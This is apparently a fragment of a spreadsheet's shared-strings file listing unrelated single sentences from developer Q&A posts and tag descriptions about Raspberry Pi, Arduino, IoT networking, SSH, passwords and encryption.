    <t>The objects available for decoding are restricted to those that were encoded within the immediate scope of a particular object.</t>
  </si>
  <si>
    <t>Note that this tag is not to be confused with the change-password tag, which is for setting a password to a new value.</t>
  </si>
  <si>
    <t>As information is changed in backend applications it is immediately synchronized down to all devices, and available on devices even when they are offline.</t>
  </si>
  <si>
    <t>The USB connector may be protected by a removable cap or by retracting into the body of the drive, although it is not likely to be damaged if unprotected.</t>
  </si>
  <si>
    <t>The encoding, and essential principles of the decoding, are in the public domain.</t>
  </si>
  <si>
    <t>It can also recognize URLs, email addresses and phone numbers.</t>
  </si>
  <si>
    <t>Keeping the state of the control (valid/invalid, dirty/pristine, touched/untouched, validation errors).</t>
  </si>
  <si>
    <t>The Window.confirm() method displays a modal dialog with an optional message and two buttons, OK and Cancel.</t>
  </si>
  <si>
    <t>So there are many actions that can be taken by django like add user, change their permissions, change their access levels and many more.</t>
  </si>
  <si>
    <t>- 
Keeping the state of the control
(valid/invalid, dirty/pristine, touched/untouched, validation
errors).</t>
  </si>
  <si>
    <t>This is apparently due to a bug in twitter's cookie handling.</t>
  </si>
  <si>
    <t>Through its .NET API, it loosely couples with Microsoft-based applications to integrate with your current security, branding, and navigation.</t>
  </si>
  <si>
    <t>Browsers limits the styles that can be set for  links, due to security issues.</t>
  </si>
  <si>
    <t>The PCI-DSS applies whenever an organisation stores, processes or transmits payment card data.</t>
  </si>
  <si>
    <t>.htpasswd is a flat-file used to store usernames and passwords for basic authentication on Apache HTTP Servers.</t>
  </si>
  <si>
    <t>Ranges of transparency may change according to the software setup.</t>
  </si>
  <si>
    <t>Richard Stallman, a proponent of free software, defines hacking in a more general sense.</t>
  </si>
  <si>
    <t>In Drupal, every users have specific permissions that are indirectly assigned to each user; each user is assigned to a role, and the permissions are assigned to the roles.</t>
  </si>
  <si>
    <t>A hash function that assigns unique indices to strings, even if inconsistent between runs, is a perfectly validthough non-deterministichash function.</t>
  </si>
  <si>
    <t>during the night
Build a wall against off-topic questions by deleting all of them by myself (same credibility as the other guy's wall - yeah the orange one who used my first sentence during election too)
Collaborate with russia, they know how to hack an election.</t>
  </si>
  <si>
    <t>I used its uninstall script to make sure that all changes would be recovered.</t>
  </si>
  <si>
    <t>Can anyone provide me with good links to integrate fingerprint scanner with Raspberry pi.</t>
  </si>
  <si>
    <t>But as the browsers have issues with recognizing the certificate issuer, I need to give the intermediate certificate throught the ssl_certificate_chain attribute which can be only allowed by using the ssl_module = 'pyopenssl'.</t>
  </si>
  <si>
    <t>I can login to the pi via SSH but the screen, having displayed the login progress becomes unresponsive, whatever I type in is ignored.</t>
  </si>
  <si>
    <t>A friend of mine told me that this approach will fail if routers's gateway is changed.</t>
  </si>
  <si>
    <t>Ideally, I would like to be able to have it running on the Pi and that I don't have to SSH into the Pi every time I need to run it, as it is for an IoT project.</t>
  </si>
  <si>
    <t>When I try to open Device Portal from Win 10 IoT Dashboard, Device Portal cannot recognize the set up password.</t>
  </si>
  <si>
    <t>Is there a possibility to register the plugin of a new SD Card so the cloning starts?</t>
  </si>
  <si>
    <t>Any ideas how to configure these registers in a kernel character device driver?</t>
  </si>
  <si>
    <t>I am assuming that I am having trouble with serial write permissions in Ubuntu.</t>
  </si>
  <si>
    <t>One idea I have is that perhaps after authenticating on the phone, the resulting credentials file could be sent to the Raspberry Pi?</t>
  </si>
  <si>
    <t>Unfortunately the pi4 is not yet supported by things - so this would mean to wait or hack the image.</t>
  </si>
  <si>
    <t>This either will unique identify the user and also will give u an idea about the queue of users.</t>
  </si>
  <si>
    <t>have the binaries sent to the RPi and the BeagleBoard
Two words: SSH / SCP.</t>
  </si>
  <si>
    <t>If they are different, one or the other ide might be corrupt or an incorrect include might be occurring.</t>
  </si>
  <si>
    <t>How these codes are generated is of course dependent on the hardware; most PCs uses something that is compatible with the Intel 8042 AT keyboard controller.</t>
  </si>
  <si>
    <t>Because of its security properties it will be a new UID every time you present your phone to the reader.</t>
  </si>
  <si>
    <t>Note: you can find a c++ face detection sample for Intel Galileo here</t>
  </si>
  <si>
    <t>One issue is that you might need to run it as root to have access to gpio, unless you can adjust the read access for those devices.</t>
  </si>
  <si>
    <t>No, on the Raspberry PI model B the USB hardware is actually connected to a built in Hub, this fixes the USB format as master, there is no way a model B can be a "slave device".</t>
  </si>
  <si>
    <t>It took 3-5 minutes for SSH to start on my Pi on the initial boot.</t>
  </si>
  <si>
    <t>According to this thread, you just need to adjust permissions to the  file (which is created when using the --compat switch).</t>
  </si>
  <si>
    <t>Because he issued su clay he might know that such a user (presumably your user) even exists on that machine, without examining /etc/passwd or similar.</t>
  </si>
  <si>
    <t>WPA automatically changes secret keys after a certain period of time.</t>
  </si>
  <si>
    <t>So in order to connect with the default protocol settings in Node-RED you will need to specify a username and password (default are admin/password123).</t>
  </si>
  <si>
    <t>Well the enq is equal to ASCII code 5 which does not have any character associated with it so it's unreadable character.</t>
  </si>
  <si>
    <t>In my case: 
NAME: WarlibRegistry
ADDRESS: warlibregistry.azurecr.io
USERNAME &amp; PASSWORD from the "Access keys" section of your container registry.</t>
  </si>
  <si>
    <t>The Aztec code is a kind of 2D barcode, encoding machine-readable data as an image.</t>
  </si>
  <si>
    <t>RFID is short for Radio Frequency IDentification.</t>
  </si>
  <si>
    <t>You may covert all combobox as image combobox, you may convert by id,
multiple ids, or by wild card.</t>
  </si>
  <si>
    <t>All PIAs must
  be signed by their publisher so the publisher key must also be
  supplied with the /keyfile switch.</t>
  </si>
  <si>
    <t>I am trying to make a script which automatically enters the password "root" to copy the ssh-key from A to B.</t>
  </si>
  <si>
    <t>Can I still use the username and password when including encryption
mosquitto-tls?</t>
  </si>
  <si>
    <t>This mean that I need to provide the password for the WiFi network from a file, and the
remaining thing is to do the scanning and connecting automatically.</t>
  </si>
  <si>
    <t>This doesn't happen if I give it the username "root".</t>
  </si>
  <si>
    <t>However, recently Google changed some of their policies so these unofficial apps won't work, so now it asks for a CAPTCHA and an HTTP 503 error.</t>
  </si>
  <si>
    <t>My credentials are username:password, and I used an online conversion utility to get dXNlcm5hbWU6cGFzc3dvcmQ=.</t>
  </si>
  <si>
    <t>PS : I can read HID messages from the device, so it is not a permission issue.</t>
  </si>
  <si>
    <t>What should I do to protect my code from stealing and make changes into the code?</t>
  </si>
  <si>
    <t>However, when I push on my RPi (running Raspbian OS) it asks for my username/password every time.</t>
  </si>
  <si>
    <t>The encryption class:
Any ideas what can cause the problem?</t>
  </si>
  <si>
    <t>Connecting from my cellular modem to a Mosquitto server using SSL encryption and username and password.</t>
  </si>
  <si>
    <t>Hopefully you've got backups, as there's no guarantee to recover your files if the data has been corrupted.</t>
  </si>
  <si>
    <t>If the value of  is empty, it's possible due to an incorrect key supplied in loadKey.</t>
  </si>
  <si>
    <t>It's pretty cheap and supports 802.11 b/g/n protocols.</t>
  </si>
  <si>
    <t>However, that is a bad idea, because everyone who can access your script can get your password.</t>
  </si>
  <si>
    <t>According to this documentation page,  is RFC2396 encoded.</t>
  </si>
  <si>
    <t>That's a common problem when you have your computer username with spaces.</t>
  </si>
  <si>
    <t>I read some issues with the missing bcrypted.dll on github.</t>
  </si>
  <si>
    <t>After some tests, I conclude that my app can access to internet on the emulator, but the way using Ethernet or Wifi is the issue.</t>
  </si>
  <si>
    <t>File permissions on any of the files are not relevant either, so just leave them low.</t>
  </si>
  <si>
    <t>Turning off detection is also a very good way to do this.</t>
  </si>
  <si>
    <t>To check the decoding you use irw(1).</t>
  </si>
  <si>
    <t>One is that use the user and password which shows in your ACR on the Azure portal.</t>
  </si>
  <si>
    <t>It's possible that there has been a version change since your question was asked, but I have been successful with placing the following line in /etc/ntopng/ntopng.conf (and I have used your settings for , &lt;database&gt;, &lt;table&gt;, &lt;user&gt; and &lt;password&gt;)
From the docs it should be in the form;
-F "mysql;&lt;server&gt;;&lt;database&gt;;&lt;table&gt;;&lt;user&gt;;&lt;password&gt;"
This is obviously slightly different to what you have above (although --dump-flows should be replaceable for -F).</t>
  </si>
  <si>
    <t>Standard html form declaration is,
Reference
Forms Wikipedia Article
W3C Specification
What is an HTML Form
 are required to collect different kinds of user inputs, such as contact details like name, email address, phone numbers, or details like credit card information, etc.</t>
  </si>
  <si>
    <t>Data santization is used to prevent code injection problems, by secure input and output handling, such as:
Input validation
Selective input inclusion/exclusion
Escaping dangerous characters.</t>
  </si>
  <si>
    <t>The Internet of Things (IoT) is a novel paradigm where many of the objects that surround us will be connected to the Internet, these objects can be Radio-Frequency IDentification (RFID) tags, sensors, actuators, mobile phones, etc.</t>
  </si>
  <si>
    <t>To make the streaming more robust you would need to put a system in place to check that a client connection is alive, and when it isn't, maybe trigger a reload of the image, so that the streaming is reestablished.</t>
  </si>
  <si>
    <t>If that line is missing or indeed contains the same number for all your boards - use this udev rule to assign unique aliases based on the USB port number:</t>
  </si>
  <si>
    <t>In order to send these APDU commands to the iPhone usng the MFRC522, you would need a library that performs anticollision and activation (up to the ISO/IEC 14443-4 layer) of the contactless card emulated by the iPhone and that handles wrapping the APDUs into frames of the ISO/IEC 14443-4 transport protocol.</t>
  </si>
  <si>
    <t>Ours turn out to be as described here:
https://github.com/mattgallagher/AudioStreamer/issues/6
In particular, MyAudioSessionInterruptionListener (or the name of the callback passed to 
AudioSessionInitialize) and it's inClientData can not be changed after it's been registered, so the callback must always do something sensible even if the underlying object has been deallocated.</t>
  </si>
  <si>
    <t>The process of forming tokens from an input stream of characters is called tokenization, and the lexer categorizes them according to a symbol type.</t>
  </si>
  <si>
    <t>In the words of Vyper developers themselves, Vyper
will deliberately forbid things or make things harder if it deems fit
  to do so for the goal of increasing security.</t>
  </si>
  <si>
    <t>No invisible symbols after all but a terrible decision of Arduino authors :-(
I wonder whether putting the types in external header files would fix it.</t>
  </si>
  <si>
    <t>Windows UWP PointOfService namespace or POS for .NET interfaces for interacting with retail peripherals such as barcode scanners, receipt printers, etc.</t>
  </si>
  <si>
    <t>After putting the listener bashscript in the same network (basically by giving the raspberry on which it runs a second IP in the network the ESP is in), the blocked ESP communication didn't happen again.</t>
  </si>
  <si>
    <t>The system we are designing is being used to read input from a fingerprint scanner and output a unique ring to a speaker.</t>
  </si>
  <si>
    <t>The problem is that every time I try to connect to my rasperry pi with
the following error occurs: ssh: Could not resolve hostname rasperrypi
Both devices are connected by LAN with the same router.</t>
  </si>
  <si>
    <t>If this can help, every url in dataplicity shows as https, except when I hit a redirect(url_for) or a @login_requested function, it turns to http.</t>
  </si>
  <si>
    <t>like the following:
https://prod.api.pvp.net/api/lol/na/v1.1/summoner/by-name/RiotSchmick?api_key=&lt;key&gt;
If the above is not the case and you are in fact passing the key correctly and still getting a 
{"status": {"message": "Access denied", "status_code": 401}}  reponse, then the key is most likely invalid.</t>
  </si>
  <si>
    <t>As an experienced Unix user who last used Windows seriously about six years ago I found it quite intimidating to have to
a) log into my Microsoft account (that I last used from a different continent) 
b) sign up as a "Windows Insider"
Even after going through these hurdles I only stumbled across the ISO file by accident, and even then nothing for the Raspberry Pi.</t>
  </si>
  <si>
    <t>Permission based problems, either:
* As mentioned in the comments, restart tutorial by not deviating, or
* Fix permissions, in your "home"-case (otherwise /opt/...)</t>
  </si>
  <si>
    <t>I am getting from Arduino with pollserial communication bytes of images captured from a security camera, with the help of Video Experimenter Shield.</t>
  </si>
  <si>
    <t>I am not looking to have people register and create a username/password, but I would like to have the site require them to enter a Nickname when they connect.</t>
  </si>
  <si>
    <t>I can login with no problem into my site but the second I enter an area where there is entity framework i get the following error with XSP:
Don't really know what else could be wrong.</t>
  </si>
  <si>
    <t>NFC Shield
I have been using a mifare ultralight tag but I encounter a problem when trying to authenticate a specific memory address.</t>
  </si>
  <si>
    <t>The whole point of a mine detection robot is that the goals are unknown.Any cheap sensors can be used.</t>
  </si>
  <si>
    <t>In my current implementation I have the following problem:
If I press the W key so it will be detected and sets the GPIO.</t>
  </si>
  <si>
    <t>My idea is to connect to a webserver to login and i'll have a database on the webserver where i store a unique identifier associated to the user and the device, so i can have multiple people accessing their unique device from the same webserver.</t>
  </si>
  <si>
    <t>If so, will there be some hidden bugs inside the system which we can't find immediately but affect the system work properly?</t>
  </si>
  <si>
    <t>I know i can use the software serial as a hack solution, but its a little slower than I'd be happy with, so any suggestions would be awesome!</t>
  </si>
  <si>
    <t>The following is my header file:
So my problem is that the Arduino Yun is not recognizing the files in the directory "/root/certs/" where the credentials are to connect to AWS IoT.</t>
  </si>
  <si>
    <t>I'm using the usb4java low level API (LibUsb 1.0) library in my web application to read a barcode scanner input in Raspberry Pi.</t>
  </si>
  <si>
    <t>The target website which is displayed by the terminal contains a hidden Java Applet which is signed and has all local privileges.</t>
  </si>
  <si>
    <t>Please note that I am using AirTel India, I have a fully activated Data Plan &amp; the PIN Number has been changed to 0000.</t>
  </si>
  <si>
    <t>Update 26.05.2016:
At least I could fix the "UNAVAILABLE HID Device Descriptor" issue with a trick.</t>
  </si>
  <si>
    <t>The doc states:
Note that the camera preview only works when a monitor is connected to
  the Pi, so remote access (such as SSH and VNC) will not allow you to
  see the camera preview.</t>
  </si>
  <si>
    <t>Once booted I opened terminal and entered "sudo raspi-config", where I then enabled SSH manually.</t>
  </si>
  <si>
    <t>I bought an Ethernet shield three days ago, but I have problems with internet connection.</t>
  </si>
  <si>
    <t>When one reaches the limit, a button press returns it to safe levels.</t>
  </si>
  <si>
    <t>According to my knowledge and research so far the only current solution is the third solution, that is to get the System Privileges.</t>
  </si>
  <si>
    <t>3) All our Wifi is Open wifi (but we should register in the common site)
What will be the problem on this?How to solve.</t>
  </si>
  <si>
    <t>However, the issue I am facing is that right now I am running this function is being called every time my user requests authentication, when it really only needs to be ran when the user signs up.</t>
  </si>
  <si>
    <t>The problem is that I cannot obtain the device's IP address, which seems to be a requirement in order for me to connect to it through programs like Putty.</t>
  </si>
  <si>
    <t>Second is;   
Changed the bind-address to 0.0.0.0,
Created another user to connect to MySQL with and grant all
privileges.</t>
  </si>
  <si>
    <t>Today, even by reinstalling Gulp and NPM modules that I use, I always get these lines of errors, no matter what solutions I try, nothing is conclusive: changing permissions etc ...
Do you have any leads to tell me?</t>
  </si>
  <si>
    <t>Whenever I would change something in my code and/or use the Arduino in a short amount of time, the data stored in the EEPROM gets corrupted.</t>
  </si>
  <si>
    <t>If button is pressed at disabled states also, it will go to print_token function when the button came normal state.</t>
  </si>
  <si>
    <t>When I try to connect through the menu option while running with a monitor connected, my particular network is not visible, even though my work's corporate networks are visible in the same menu.</t>
  </si>
  <si>
    <t>I'm trying to create a private tracker using qBitTorrent embedded tracker, but got stuck in the middle.</t>
  </si>
  <si>
    <t>The problem is with recognizing library token(Servo_h) from servo lib., within Sampling library.</t>
  </si>
  <si>
    <t>This is done automatically by the Arduino IDE when it launches avr-gcc
Other issues
Some of the supplied include files are not C++ safe, i.e.</t>
  </si>
  <si>
    <t>Out of the 3 phones, I would suggest you to try with nexus S, with stock ROM, since CM (even after pushing the jars) has issues enabling ADK.</t>
  </si>
  <si>
    <t>There's no clean way to recover from this condition, a full protocol reset is required.</t>
  </si>
  <si>
    <t>Here is the link for the people detection code, or you can find it in samples of the opencv package.</t>
  </si>
  <si>
    <t>At the level of battling hardware into life, you start having to know about the dirty secrets below the abstractions you normally use.</t>
  </si>
  <si>
    <t>If the connection is lost because of a problem in the shield, then powering it off and on again will probably do the trick, but you will have to enter the PIN again of course.</t>
  </si>
  <si>
    <t>See the answer I added here for more info, or go straight to the resolved issue about tkinter's thread safety on the Python bug tracker here.</t>
  </si>
  <si>
    <t>This link is a little more specific:
http://pydev.org/manual_adv_remote_debugger.html
Also, my host IP address had changed, so that was incorrect in the pydevd.settrace() command.</t>
  </si>
  <si>
    <t>Then, you can send the email to them with the temporary reset values, and you wouldn't need to ship your SMTP credentials on their device.</t>
  </si>
  <si>
    <t>If the Raspberry Pi is connected to the Internet with a public IP Address (I guess it doesn't since it uses UMTS) then you can setup a TCP Listener where the iPhone will connect to.</t>
  </si>
  <si>
    <t>(warning: this is going to be boring, lots of "network lawyer" stuff)
The IEEE 802.11 standard relevant to this is IEEE Std 802.11i-2004 "Amendment 6: Medium Access Control (MAC) Security Enhancements"[0], aka "WPA2".</t>
  </si>
  <si>
    <t>Maybe (Maybe) your problem because of using clone module, try this solution with upload genuine firmware to your hm-10.</t>
  </si>
  <si>
    <t>Finally if the network operator receive the correct random from the SIM card, your are authenticated to the network.</t>
  </si>
  <si>
    <t>It appears your error is due to the fact you are not using Python and OpenSSL versions to support TLS v1.2 which is required by IoT Platform for encrypted connections.</t>
  </si>
  <si>
    <t>A simple print password added in your code and regardless of the used method the password will be accessible.</t>
  </si>
  <si>
    <t>You'll need a pull-up or pull-down on that line anyway to ensure it has a valid level when the device isn't attached.</t>
  </si>
  <si>
    <t>I got same error, and found this link:
WSO2 Carbon Database getting corrupted
I changed all ${admin.password} entries to my new password in the file core/repository/conf/api-manager.xml and login started to work.</t>
  </si>
  <si>
    <t>You can change your service's security policy by going to Security &gt; Connection Security and changing the default rule.</t>
  </si>
  <si>
    <t>I rewrote the password check function with a while loop and integrated a function that displays a * on the LCD each time a key is pressed.</t>
  </si>
  <si>
    <t>One of the first checks you can run, is go through your broker configuration (if it your own broker, otherwise ask your vendor for the credentials), and look if you have set any username/password for connection or not.</t>
  </si>
  <si>
    <t>Solved by adding  at the end of read_eeprom as follows:
Credits to @Mat for identifying the FD leak</t>
  </si>
  <si>
    <t>I managed to solve the problem by passing a Signed URL to the device via the configuration.</t>
  </si>
  <si>
    <t>This is how i configured the base plugins:
After this, I always got EGL_NOT_INITIALIZED error, because gstreamer was picking the wrong shared libraries.</t>
  </si>
  <si>
    <t>the easy way would be to simply install dataplicity on your pi, they let you use one pi for free, its basically a ssh service that lets you access your pi over the internet.</t>
  </si>
  <si>
    <t>Try this modification,
Pull down all the buttons and also add a delay component inside the for loop which calls the passcode method.</t>
  </si>
  <si>
    <t>So even if I go to 500 homes with this technology, I can login the network with my phone number, and it will pick up MY pi's UUID.</t>
  </si>
  <si>
    <t>The Cert error was due to me being HARDWIRED into my RBI verses using wifi, after going into , and setting up a wifi connection I was able to successfully clone the github repo.</t>
  </si>
  <si>
    <t>Device detection is the process of deducing information, such as usable screen width and browser type, about a client device.</t>
  </si>
  <si>
    <t>You can also prevent a user from exiting an app by disabling the hardware buttons and touchscreen sensor.</t>
  </si>
  <si>
    <t>A passphrase is a sequence of words or other text used to control access to a computer system, program or data.</t>
  </si>
  <si>
    <t>Stateless apps don't expose any information about what has happened or changed since it started running</t>
  </si>
  <si>
    <t>A screen lock is a software feature that keeps users from accidentally sending input to a device.</t>
  </si>
  <si>
    <t>BarTender barcode software is a design-and-print software for labels, barcodes, cards and RFID tags.</t>
  </si>
  <si>
    <t>Roaming helps ensure that a traveling wireless device (typically a cell phone) is kept connected to a network without breaking the connection.</t>
  </si>
  <si>
    <t>Use this tag for questions about PSFTP, a PuTTY tool used to transfer files between computers over SSH.</t>
  </si>
  <si>
    <t>ORA-01741 is an Oracle Database Error Message indicating that an illegal zero-length identifier has been encountered during the execution of the routine.</t>
  </si>
  <si>
    <t>International Mobile Equipment Identity a number, usually unique, to identify 3GPP (i.e., GSM, UMTS and LTE) and iDEN mobile phones, as well as some satellite phones.</t>
  </si>
  <si>
    <t>In the context of the Microsoft Windows NT line of operating systems, a SID (Security IDentifier) is a unique, immutable identifier of a user, user group, or other security principal.</t>
  </si>
  <si>
    <t>A media item has an overall unique identifier, accessed using the MPMediaItemPropertyPersistentID property key, as well as specific identifiers for its metadata.</t>
  </si>
  <si>
    <t>Feature at glance
Fully Skin-able
Your original dropdown is safe, so your form post will not be messed.</t>
  </si>
  <si>
    <t>Stateless apps don't expose any information about what has happened or changed since it started running.</t>
  </si>
  <si>
    <t>.once(key, fn, [ttl]): Given a unique unique key to represent the function, fn will be invoked in only one window.</t>
  </si>
  <si>
    <t>RC4 was initially a trade secret, but in September 1994 a description of it was anonymously posted to the Cypherpunks mailing list.</t>
  </si>
  <si>
    <t>The Internet Assigned Numbers Authority identifies this encoding using the string "macintosh".</t>
  </si>
  <si>
    <t>It allows the developers to easily add the barcode generation and recognition functionality to applications.</t>
  </si>
  <si>
    <t>Most modern character-encoding schemes are based on ASCII, though they support many more characters than did ASCII.</t>
  </si>
  <si>
    <t>Consider the above example with proper locking:
Person #1 sees the incorrect line and starts editing it.</t>
  </si>
  <si>
    <t>EMV cards (also known as "chip and pin") use smartcards to increase security and decrease fraud.</t>
  </si>
  <si>
    <t>A 403 Forbidden may be returned by a web server due to an authorization issue or other constraint related to the request.</t>
  </si>
  <si>
    <t>They have also become a source of security and privacy issues, as some built-in webcams can be remotely activated via spyware.</t>
  </si>
  <si>
    <t>I'm vaultah, three-time moderator election loser, information security, photography, and music enthusiast, and an open-minded and reasonable person (I hope).</t>
  </si>
  <si>
    <t>This would allow me to add a new wifi network/password when I move to a new location (I usually can't get the wifi network/password in advance).</t>
  </si>
  <si>
    <t>GSS-API is an IETF standard that addresses the problem of many similar but incompatible security services in use today.</t>
  </si>
  <si>
    <t>However, this results in a bunch of random, unidentifiable characters flashing on the screen.</t>
  </si>
  <si>
    <t>I have to say that i connect to my Raspberry throw SSH, but even if i record the video, and then i watch it on my PC is very slow.</t>
  </si>
  <si>
    <t>Also I've checked to press any other key like lock num and it also continues working, on the example and on the real program.</t>
  </si>
  <si>
    <t>I have a problem that arduino upload a file in sdcard to MS azure cognitive service, such as use a image file for face identify.</t>
  </si>
  <si>
    <t>https://github.com/username/reponame.git
then you can convert it to the ssh style address:
ssh://git@github.com/username/reponame.git   (mind that you only have to change username and reponame parts.</t>
  </si>
  <si>
    <t>Detection attemps to discover malware while not allowing it to be executed, for this reason, most detections search for "footprints", i.e.</t>
  </si>
  <si>
    <t>For Windows' applications this property will return the username, password &amp; domain of the user running the application.</t>
  </si>
  <si>
    <t>If supplied MD5 was not rcognized, service generates an unique image pattern for it.</t>
  </si>
  <si>
    <t>I guess that the UARTs on the Intel Galileo board don't use/emulate the normal/legacy COM ports 3F8h, 2F8h, 3E8h, or 2E8h.</t>
  </si>
  <si>
    <t>According to the image after installing linux-firmware it should be able to connect to the wifi.</t>
  </si>
  <si>
    <t>There is whole output from v4l2-ctl --all
Any ideas how to change the keyframe interval without reencoding the media?</t>
  </si>
  <si>
    <t>Most probably because somehow the internet key is considered as preferred connection but I don't have idea how to change this.</t>
  </si>
  <si>
    <t>I have also tried the memdump example, however after compiling that code i realised that for some reason there are no authentication after sector 1 and have no idea why this is happening.</t>
  </si>
  <si>
    <t>In other words, don't raise an alarm on the first detected issue.</t>
  </si>
  <si>
    <t>The MAC address (Device ID) I used to register the device was all in caps, so I make the Iot-out node for the command so that it was all capitalized and made the Iot-in node to test for the message so that it was all capitalized.</t>
  </si>
  <si>
    <t>According to this post on ServerFault and this blog, it seems likely that there is something wrong with your local files (corruption, mis-configuration, etc).</t>
  </si>
  <si>
    <t>You can check the router name online to find the default username and password.</t>
  </si>
  <si>
    <t>Simplifies correct handling of password stretching (PBKDF2), salting, and IV.</t>
  </si>
  <si>
    <t>I have a raspberry pi running arch linux connected to the TV and want to run commands on that screen by SSH'ing from my Ubuntu machine elsewhere.</t>
  </si>
  <si>
    <t>This wrong tag created by someone in taxonomist badge hunt will be automatically removed later.</t>
  </si>
  <si>
    <t>Has anyone an idea why no speech is detected/ the spoken words not will be returned?</t>
  </si>
  <si>
    <t>That leaves the original DLL available for substitution and doesn't put a lock on them.</t>
  </si>
  <si>
    <t>Could be good to check those before decoding any message.</t>
  </si>
  <si>
    <t>what you can do to detect your rpi ip  is scanning for ssh servers in your subnet.</t>
  </si>
  <si>
    <t>With this approach you can have "presence" detection according the existence of a user on your wireless network.</t>
  </si>
  <si>
    <t>When new phone try to connect to your device you should check if device passed that key and if not, do nothing in response.</t>
  </si>
  <si>
    <t>Authentication strategy for Passport JS using a username/email and password.</t>
  </si>
  <si>
    <t>I don't want it to activate the command when any card is scanned only the one that has a certain name.</t>
  </si>
  <si>
    <t>I am currently working on fingerprint-based student attendance system.</t>
  </si>
  <si>
    <t>I am trying to make a WiFi Network scanner using the ESP32.</t>
  </si>
  <si>
    <t>With it you can modify files and directories, as well as access changes, permissions and more.</t>
  </si>
  <si>
    <t>So, I'm using a raspberry pi and trying to make a security camera device.</t>
  </si>
  <si>
    <t>I don't have enough knowledge about security issue to be comfortable doing this.</t>
  </si>
  <si>
    <t>You need a  block in your conf file for it to be recognised, as shown here.</t>
  </si>
  <si>
    <t xml:space="preserve">
Check your permissions; especially folder permissions.</t>
  </si>
  <si>
    <t>I am experiencing two problems:
1- My HMAC never matches the original
2- I am unable to decrypt the encrypted payload, always an empty string 
I have a feeling that both of these issues are to do with the format of the content (hex), as I have managed to encrypt hello123 and decrypt it again with the current configuration.</t>
  </si>
  <si>
    <t>My thoughts:
I think within the private network you aren't really making contact/communication with the internet; you are just sending the command directly from phone app to raspberry.</t>
  </si>
  <si>
    <t>If something goes wrong, a good start is usually to look at the logfiles (all commands assumed to be run as root):
Now your specific errors () hint that you are running into a permission problem.</t>
  </si>
  <si>
    <t>If you store user passwords in the clear, then an attacker who steals a copy of your database has a giant list of emails and passwords.</t>
  </si>
  <si>
    <t>Often, a user profile can have capabilities for personalizing the public profile view and changing the access settings in order to make certain data visible only to certain users.</t>
  </si>
  <si>
    <t>While the question why the data comes corrupted still remains, here is a workaround I managed to achieve:
I'm checking the checksum, if it's incorrect, then:
I'm looking for  in the whole data.</t>
  </si>
  <si>
    <t>User details are entered, on this form and if the details are correct, it should close that form and open the next one.</t>
  </si>
  <si>
    <t>Having done some research this does not see to be a well known process or can be done at all, however my solution would be on a key press, the operation to only occur for half a second, to imitate the process of holding a key.</t>
  </si>
  <si>
    <t>So I need to control a RPi from a separate PC running Labview, and serial is the only way I've managed to get any communication working at all (why can't they just implement SSH...).</t>
  </si>
  <si>
    <t>Let's analyze the following code example:
Clang will report error:
/private/tmp/src.cpp:2,9 - Error - use of undeclared identifier 'func'
But i can find lot's of such errors in wide used examples, f.e.</t>
  </si>
  <si>
    <t>Things that I have tried:
running program as sudo,
updating permissions,
changing user permissions, and
changing IP tables to allow for the port 6454.</t>
  </si>
  <si>
    <t>In a nutshell, I have some Particle Photons controlling lights, an Arduino controlling the security system (door keypad, motion sensors) and some IR devices talking to Raspberry Pi that is doing some text-to-speech.</t>
  </si>
  <si>
    <t>As you can see - the issue is not that the driver isn't installed or that avrdude can't see the device, but simply that the connection seems to die as soon as it is established.</t>
  </si>
  <si>
    <t>The question is if there is a way to store a number entered by the user in a variable and not let the program overwrite it with 0 because no key is being pressed at that moment.</t>
  </si>
  <si>
    <t>How can I solve this problem in  operating system
end Kernel panic - not syncing: VFS: Unable to mount root fs on unknown-block</t>
  </si>
  <si>
    <t>The different solutions I have tried:
In flock_email.sh, I have tried to directly change the file permissions to read-only instead of using flock, having it sleep, then changing the permissions back to allow execution of the file.</t>
  </si>
  <si>
    <t>Any suggestion on how to anonymously upload to Firebase Storage without the Firebase Authentication Package and without runtime errors?</t>
  </si>
  <si>
    <t>Reading the LoRaWAN specification, the JOIN REQUEST has a node unique DevEUI, a network unique AppEUI, and a random DevNonce (to prevent replay attacks).</t>
  </si>
  <si>
    <t>First rule in programming is research potential existing solutions to exploit - so you can concentrate on your problem.</t>
  </si>
  <si>
    <t>Here's the solution that worked for me:
https://raspberrypi.stackexchange.com/a/60375/26923
In essence:
I believe the problem is that the keypair files that are generated on first boot were corrupt (perhaps from plugging and unplugging power during the setup process).</t>
  </si>
  <si>
    <t>To access an IP camera is very simple, you just need this line:
Now, if you dont have internet the IP camera as the PI should be on the same network, you can have a wireless router with no internet.</t>
  </si>
  <si>
    <t>Even if you don't set up a virtualenv to help with package management for your Python project, you can still use pip to install GPIO, but you'll face the permission issues you're dealing with now.</t>
  </si>
  <si>
    <t>is a program that used together with OpenSSH or similar SSH programs provides a secure way of storing the private key.</t>
  </si>
  <si>
    <t>Unique-constraint is an index that sets one or multiple fields to be unique in a data entity</t>
  </si>
  <si>
    <t>This tag refers to the process of setting a password on a system back to an original (often the default) value.</t>
  </si>
  <si>
    <t>Synapse solves the problem of automated fail-over in the cloud, where failover via network re-configuration is impossible.</t>
  </si>
  <si>
    <t>Proposed payment system leveraging payment channels which allow re-negotiation of balances that finally get executed on the Bitcoin blockchain.</t>
  </si>
  <si>
    <t>Its primary purpose is to run graphical commands that need root without the need to run an X terminal emulator and using su directly.</t>
  </si>
  <si>
    <t>Choose your audience, set your budget, and run your campaign across thousands of Apple-verified and brand-safe iOS apps.</t>
  </si>
  <si>
    <t>You can add Access-Control headers to the endpoint to fix it on modern browsers, but it will still cause issues on
IE9 and below.</t>
  </si>
  <si>
    <t>The PayPal Mobile Payment Libraries (MPL) provides a secure, extensible, and scalable way to add PayPal functionality to your native mobile apps.</t>
  </si>
  <si>
    <t>Spammers take advantage of this fact, and frequently outsource parts of their operations to countries where spamming will not get them into legal trouble.</t>
  </si>
  <si>
    <t>Exonum can be used to create cryptographically powered distributed ledgers in virtually any problem domain, including FinTech, GovTech, and LegalTech.</t>
  </si>
  <si>
    <t>MAC spoofing is a technique for changing a factory-assigned Media Access Control (MAC) address of a network interface on a networked device.</t>
  </si>
  <si>
    <t>I am looking for advises and suggestions to achieve this online monitoring function in an effective way, any suggestions are welcome and appreciated.</t>
  </si>
  <si>
    <t>Tried using "truncate" in nix but (for some reason) vital data is stored at the end, or there's a checksum, because lopping off a few hundred mb was enough to corrupt the file and prevent mounting / writing.</t>
  </si>
  <si>
    <t>My next step is to start changing the web service to not require client authentication and see if that is the problem.</t>
  </si>
  <si>
    <t>I've installed  and enabled VNC in raspi-config 
I'm running into an issue with encryption on the VNC service - trying to connect from OSX using the built in Screen Sharing application.</t>
  </si>
  <si>
